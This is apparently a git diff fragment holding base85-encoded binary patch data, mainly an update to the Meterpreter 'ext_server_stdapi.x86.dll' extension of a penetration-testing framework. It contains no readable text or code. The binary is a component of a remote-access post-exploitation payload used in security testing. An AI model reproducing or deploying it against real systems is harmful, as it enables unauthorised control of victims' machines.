zQ=LzBJ!P6ontV;Ad~wzIxGX_*S;Ml}vZiJ6Wi89fp9nlr@kHo}8vFU_xf2eGKHKnY
z?AfMgji37(MQa+vjq@6D0*nc(M9F1s%et23Jzny7>Eq>V@0gyu&QrpdNqNSwF)vmU
zD~<VMfmkpWiiOvneMIi7o)J_IQyKV|moE=2uUH;jUbQ^5yk>cL`Ml+JX&`rXLB}(u
zj)SKSd+dzdsrHbga$9>-BW9(4iCMGOb9C+#9#7C-eoXH1kqW-=%8M%RxqOT7iIykK
z3g3#-75)|FD*`JjRs>g6tq85CSrJ|_Z$;gT`W4X?4J%?RnpVVDw5&+1XkC$9(Y7MB
zqGLtpimnx=Ij`B<T+-}oE^YQVmp2ERE1HANRn4L1n&xnGU2}bNw7H=<*4)$_Z*FN$
zG`BV<o7?Q78M((qN>^5_tXWyVvT0>%W!FlxDsPo{RmG~{s?e(Ns=8GsOyVB8mul>2
z>}>36G|TgrdzY6i_bo47{yz;v{qpGYhUKy4P0QoUTb3u5CzrP^Pc4r=+3;k5&eXH}
fwr2CR@9EN~{ZE%a9eA4jWHWLn$T)fBv`7ChiD2nH

diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll
index f013ccfc5ed12a3f8c40c0200909ea6be0c81c57..0aa9e3f52034ef89ef87d1283ac508efa837e1b3 100755
GIT binary patch
delta 70822
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
